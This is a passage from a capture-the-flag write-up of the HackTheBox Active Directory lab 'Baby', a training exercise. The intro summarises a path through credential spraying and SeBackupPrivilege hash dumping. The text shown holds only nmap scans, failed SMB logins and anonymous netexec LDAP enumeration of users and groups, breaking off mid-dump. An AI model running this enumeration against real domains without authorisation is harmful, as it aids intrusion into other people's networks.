HTB: Baby
Baby is an easy Windows Active Directory box. I’ll start by enumerating LDAP to find a default credential, and spray it to find another account it works on. From there, I’ll abuse Backup Operators / SeBackupPrivilege to get dump both the local and domain hashes, finding a hash for the Administrator account that works to get a shell.
Box Info
| Name | Baby  Play on HackTheBox |
|---|---|
| Release Date | 18 Sep 2025 |
| Retire Date | 18 Sep 2025 |
| OS | Windows  |
| Base Points | Easy [20] |
 |
N/A (non-competitive) |
 |
N/A (non-competitive) |
| Creator |  |
Recon
Initial Scanning
nmap finds 21 open TCP ports:
oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.129.20.55
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-18 00:41 UTC
...[snip]...
Completed SYN Stealth Scan at 00:42, 26.51s elapsed (65535 total ports)
Nmap scan report for 10.129.20.55
Host is up, received echo-reply ttl 127 (0.022s latency).
Scanned at 2025-09-18 00:41:53 UTC for 27s
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
51832/tcp open unknown syn-ack ttl 127
51833/tcp open unknown syn-ack ttl 127
51842/tcp open unknown syn-ack ttl 127
53587/tcp open unknown syn-ack ttl 127
54390/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.61 seconds
Raw packets sent: 262098 (11.532MB) | Rcvd: 34 (1.480KB)
oxdf@hacky$ nmap -p 53,88,135,389,445,464,593,636,3268,3269,5985,9389 -sCV 10.129.20.55
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-18 00:43 UTC
Nmap scan report for 10.129.20.55
Host is up (0.022s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-18 14:34:50Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-09-18T14:34:53
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 13h51m38s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.36 seconds
The box shows many of the ports associated with a Windows Domain Controller. The domain is baby.vl, and the hostname is BABYDC.
I’ll use netexec to make a hosts file entry and put it at the top of my /etc/hosts file:
oxdf@hacky$ netexec smb 10.129.20.55 --generate-hosts-file hosts
SMB 10.129.20.55 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
oxdf@hacky$ cat hosts
10.129.20.55 BABYDC.baby.vl baby.vl BABYDC
oxdf@hacky$ cat hosts /etc/hosts | sudo sponge /etc/hosts
All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.
nmap notes a clock skew, so I’ll want to make sure to run sudo ntpdate BABYDC.baby.vl before any actions that use Kerberos auth.
SMB - TCP 445
The guest account is disables, and anonymous login fails:
oxdf@hacky$ netexec smb 10.129.20.55 -u guest -p '' --shares
SMB 10.129.20.55 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.20.55 445 BABYDC [-] baby.vl\guest: STATUS_ACCOUNT_DISABLED
oxdf@hacky$ netexec smb 10.129.20.55 -u 0xdf -p '' --shares
SMB 10.129.20.55 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.20.55 445 BABYDC [-] baby.vl\0xdf: STATUS_LOGON_FAILURE
I’ll try to check --users and --rid-brute, but neither of these work either. I’ll have to come back with creds.
LDAP - TCP 389
I’ll try using netexec to dump LDAP data on the users on the box, and this works. I’ll start by taking a look at all the objects:
oxdf@hacky$ netexec ldap BABYDC.baby.vl -u '' -p '' --query "(objectClass=*)" "" | grep "Response for object:"
LDAP 10.129.20.55 389 BABYDC [+] Response for object: DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Administrator,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Guest,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=krbtgt,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Domain Computers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Schema Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Domain Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Domain Users,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Domain Guests,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Protected Users,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Key Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Enterprise Key Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=dev,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Hugh George,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Ian Walker,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=it,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Teresa Bell,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
I’ll do a full dump on the users:
oxdf@hacky$ netexec ldap BABYDC.baby.vl -u '' -p '' --query "(sAMAccountName=*)" ""
LDAP 10.129.20.55 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.20.55 389 BABYDC [+] baby.vl\:
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn Allowed RODC Password Replication Group
LDAP 10.129.20.55 389 BABYDC description Members in this group can have their passwords replicated to all read-only domain controllers in the domain
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC uSNCreated 12402
LDAP 10.129.20.55 389 BABYDC uSNChanged 12404
LDAP 10.129.20.55 389 BABYDC name Allowed RODC Password Replication Group
LDAP 10.129.20.55 389 BABYDC objectGUID 7a320b26-be6c-8344-a875-344eb415a428
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-571
LDAP 10.129.20.55 389 BABYDC sAMAccountName Allowed RODC Password Replication Group
LDAP 10.129.20.55 389 BABYDC sAMAccountType 536870912
LDAP 10.129.20.55 389 BABYDC groupType -2147483644
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC isCriticalSystemObject TRUE
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 20211121145159.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000417.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC person
LDAP 10.129.20.55 389 BABYDC organizationalPerson
LDAP 10.129.20.55 389 BABYDC user
LDAP 10.129.20.55 389 BABYDC cn Ashley Webb
LDAP 10.129.20.55 389 BABYDC sn Webb
LDAP 10.129.20.55 389 BABYDC givenName Ashley
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Ashley Webb,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121151103.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121151103.0Z
LDAP 10.129.20.55 389 BABYDC displayName Ashley Webb
LDAP 10.129.20.55 389 BABYDC uSNCreated 12803
LDAP 10.129.20.55 389 BABYDC memberOf CN=dev,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC uSNChanged 12808
LDAP 10.129.20.55 389 BABYDC name Ashley Webb
LDAP 10.129.20.55 389 BABYDC objectGUID 3f551e09-c519-1943-bac7-2c21ff71b0fe
LDAP 10.129.20.55 389 BABYDC userAccountControl 66080
LDAP 10.129.20.55 389 BABYDC badPwdCount 0
LDAP 10.129.20.55 389 BABYDC codePage 0
LDAP 10.129.20.55 389 BABYDC countryCode 0
LDAP 10.129.20.55 389 BABYDC badPasswordTime 0
LDAP 10.129.20.55 389 BABYDC lastLogoff 0
LDAP 10.129.20.55 389 BABYDC lastLogon 0
LDAP 10.129.20.55 389 BABYDC pwdLastSet 132819810633407081
LDAP 10.129.20.55 389 BABYDC primaryGroupID 513
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-1105
LDAP 10.129.20.55 389 BABYDC accountExpires 9223372036854775807
LDAP 10.129.20.55 389 BABYDC logonCount 0
LDAP 10.129.20.55 389 BABYDC sAMAccountName Ashley.Webb
LDAP 10.129.20.55 389 BABYDC sAMAccountType 805306368
LDAP 10.129.20.55 389 BABYDC userPrincipalName Ashley.Webb@baby.vl
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163014.0Z
LDAP 10.129.20.55 389 BABYDC 20211121162927.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000416.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn Cert Publishers
LDAP 10.129.20.55 389 BABYDC description Members of this group are permitted to publish certificates to the directory
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Cert Publishers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC uSNCreated 12342
LDAP 10.129.20.55 389 BABYDC memberOf CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC uSNChanged 12344
LDAP 10.129.20.55 389 BABYDC name Cert Publishers
LDAP 10.129.20.55 389 BABYDC objectGUID c76f0c13-98d2-2745-b85f-19cb164f1c19
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-517
LDAP 10.129.20.55 389 BABYDC sAMAccountName Cert Publishers
LDAP 10.129.20.55 389 BABYDC sAMAccountType 536870912
LDAP 10.129.20.55 389 BABYDC groupType -2147483644
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC isCriticalSystemObject TRUE
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 20211121145159.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000417.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn Cloneable Domain Controllers
LDAP 10.129.20.55 389 BABYDC description Members of this group that are domain controllers may be cloned.
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC uSNCreated 12440
LDAP 10.129.20.55 389 BABYDC uSNChanged 12442
LDAP 10.129.20.55 389 BABYDC name Cloneable Domain Controllers
LDAP 10.129.20.55 389 BABYDC objectGUID 01076276-3f7a-934c-8a02-1e475f08d65a
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-522
LDAP 10.129.20.55 389 BABYDC sAMAccountName Cloneable Domain Controllers
LDAP 10.129.20.55 389 BABYDC sAMAccountType 268435456
LDAP 10.129.20.55 389 BABYDC groupType -2147483646
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC isCriticalSystemObject TRUE
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 20211121145159.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000417.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC person
LDAP 10.129.20.55 389 BABYDC organizationalPerson
LDAP 10.129.20.55 389 BABYDC user
LDAP 10.129.20.55 389 BABYDC cn Connor Wilkinson
LDAP 10.129.20.55 389 BABYDC sn Wilkinson
LDAP 10.129.20.55 389 BABYDC givenName Connor
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121151108.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121151108.0Z
LDAP 10.129.20.55 389 BABYDC displayName Connor Wilkinson
LDAP 10.129.20.55 389 BABYDC uSNCreated 12849
LDAP 10.129.20.55 389 BABYDC memberOf CN=it,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC uSNChanged 12854
LDAP 10.129.20.55 389 BABYDC name Connor Wilkinson
LDAP 10.129.20.55 389 BABYDC objectGUID 0929b836-8c42-3c41-a99e-9964cd96a973
LDAP 10.129.20.55 389 BABYDC userAccountControl 66080
LDAP 10.129.20.55 389 BABYDC badPwdCount 0
LDAP 10.129.20.55 389 BABYDC codePage 0
LDAP 10.129.20.55 389 BABYDC countryCode 0
LDAP 10.129.20.55 389 BABYDC badPasswordTime 0
LDAP 10.129.20.55 389 BABYDC lastLogoff 0
LDAP 10.129.20.55 389 BABYDC lastLogon 0
LDAP 10.129.20.55 389 BABYDC pwdLastSet 132819810684117255
LDAP 10.129.20.55 389 BABYDC primaryGroupID 513
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-1110
LDAP 10.129.20.55 389 BABYDC accountExpires 9223372036854775807
LDAP 10.129.20.55 389 BABYDC logonCount 0
LDAP 10.129.20.55 389 BABYDC sAMAccountName Connor.Wilkinson
LDAP 10.129.20.55 389 BABYDC sAMAccountType 805306368
LDAP 10.129.20.55 389 BABYDC userPrincipalName Connor.Wilkinson@baby.vl
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163014.0Z
LDAP 10.129.20.55 389 BABYDC 20211121162927.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000416.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn Denied RODC Password Replication Group
LDAP 10.129.20.55 389 BABYDC description Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain
LDAP 10.129.20.55 389 BABYDC member CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=Domain Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=Cert Publishers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=Schema Admins,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=Domain Controllers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=krbtgt,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC uSNCreated 12405
LDAP 10.129.20.55 389 BABYDC uSNChanged 12433
LDAP 10.129.20.55 389 BABYDC name Denied RODC Password Replication Group
LDAP 10.129.20.55 389 BABYDC objectGUID 1655911c-23d2-da43-bee2-cdd9b59d02a9
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-572
LDAP 10.129.20.55 389 BABYDC sAMAccountName Denied RODC Password Replication Group
LDAP 10.129.20.55 389 BABYDC sAMAccountType 536870912
LDAP 10.129.20.55 389 BABYDC groupType -2147483644
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC isCriticalSystemObject TRUE
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 20211121145159.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000417.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=dev,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn dev
LDAP 10.129.20.55 389 BABYDC member CN=Ian Walker,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=Hugh George,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=Ashley Webb,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=dev,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121151102.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121151103.0Z
LDAP 10.129.20.55 389 BABYDC displayName dev
LDAP 10.129.20.55 389 BABYDC uSNCreated 12789
LDAP 10.129.20.55 389 BABYDC uSNChanged 12840
LDAP 10.129.20.55 389 BABYDC name dev
LDAP 10.129.20.55 389 BABYDC objectGUID 61bceb45-5fb8-2745-b86d-ee4273858989
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-1103
LDAP 10.129.20.55 389 BABYDC sAMAccountName dev
LDAP 10.129.20.55 389 BABYDC sAMAccountType 268435456
LDAP 10.129.20.55 389 BABYDC groupType -2147483646
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000001.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn DnsAdmins
LDAP 10.129.20.55 389 BABYDC description DNS Administrators Group
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=DnsAdmins,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121145238.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121145238.0Z
LDAP 10.129.20.55 389 BABYDC uSNCreated 12486
LDAP 10.129.20.55 389 BABYDC uSNChanged 12488
LDAP 10.129.20.55 389 BABYDC name DnsAdmins
LDAP 10.129.20.55 389 BABYDC objectGUID 8de6e9e5-cf6b-8743-9a05-f7b023f43721
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-1101
LDAP 10.129.20.55 389 BABYDC sAMAccountName DnsAdmins
LDAP 10.129.20.55 389 BABYDC sAMAccountType 536870912
LDAP 10.129.20.55 389 BABYDC groupType -2147483644
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000001.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn DnsUpdateProxy
LDAP 10.129.20.55 389 BABYDC description DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121145238.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121145238.0Z
LDAP 10.129.20.55 389 BABYDC uSNCreated 12491
LDAP 10.129.20.55 389 BABYDC uSNChanged 12491
LDAP 10.129.20.55 389 BABYDC name DnsUpdateProxy
LDAP 10.129.20.55 389 BABYDC objectGUID 61cfa35f-57de-bf4e-b66a-af9a0610e66d
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-1102
LDAP 10.129.20.55 389 BABYDC sAMAccountName DnsUpdateProxy
LDAP 10.129.20.55 389 BABYDC sAMAccountType 268435456
LDAP 10.129.20.55 389 BABYDC groupType -2147483646
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000001.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Domain Computers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn Domain Computers
LDAP 10.129.20.55 389 BABYDC description All workstations and servers joined to the domain
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Domain Computers,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC uSNCreated 12330
LDAP 10.129.20.55 389 BABYDC uSNChanged 12332
LDAP 10.129.20.55 389 BABYDC name Domain Computers
LDAP 10.129.20.55 389 BABYDC objectGUID f2a28fe9-fd8e-6044-831a-8e32bc266126
LDAP 10.129.20.55 389 BABYDC objectSid S-1-5-21-1407081343-4001094062-1444647654-515
LDAP 10.129.20.55 389 BABYDC sAMAccountName Domain Computers
LDAP 10.129.20.55 389 BABYDC sAMAccountType 268435456
LDAP 10.129.20.55 389 BABYDC groupType -2147483646
LDAP 10.129.20.55 389 BABYDC objectCategory CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC isCriticalSystemObject TRUE
LDAP 10.129.20.55 389 BABYDC dSCorePropagationData 20211121163013.0Z
LDAP 10.129.20.55 389 BABYDC 20211121145159.0Z
LDAP 10.129.20.55 389 BABYDC 16010101000417.0Z
LDAP 10.129.20.55 389 BABYDC [+] Response for object: CN=Domain Guests,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC objectClass top
LDAP 10.129.20.55 389 BABYDC group
LDAP 10.129.20.55 389 BABYDC cn Domain Guests
LDAP 10.129.20.55 389 BABYDC description All domain guests
LDAP 10.129.20.55 389 BABYDC distinguishedName CN=Domain Guests,CN=Users,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC instanceType 4
LDAP 10.129.20.55 389 BABYDC whenCreated 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC whenChanged 20211121145158.0Z
LDAP 10.129.20.55 389 BABYDC uSNCreated 12351
LDAP 10.129.20.55 389 BABYDC memberOf CN=Guests,CN=Builtin,DC=baby,DC=vl
LDAP 10.129.20.55 389 BABYDC uSNChanged 12353
LDAP 10.129.20.55 389 BABYDC name Domain Guests
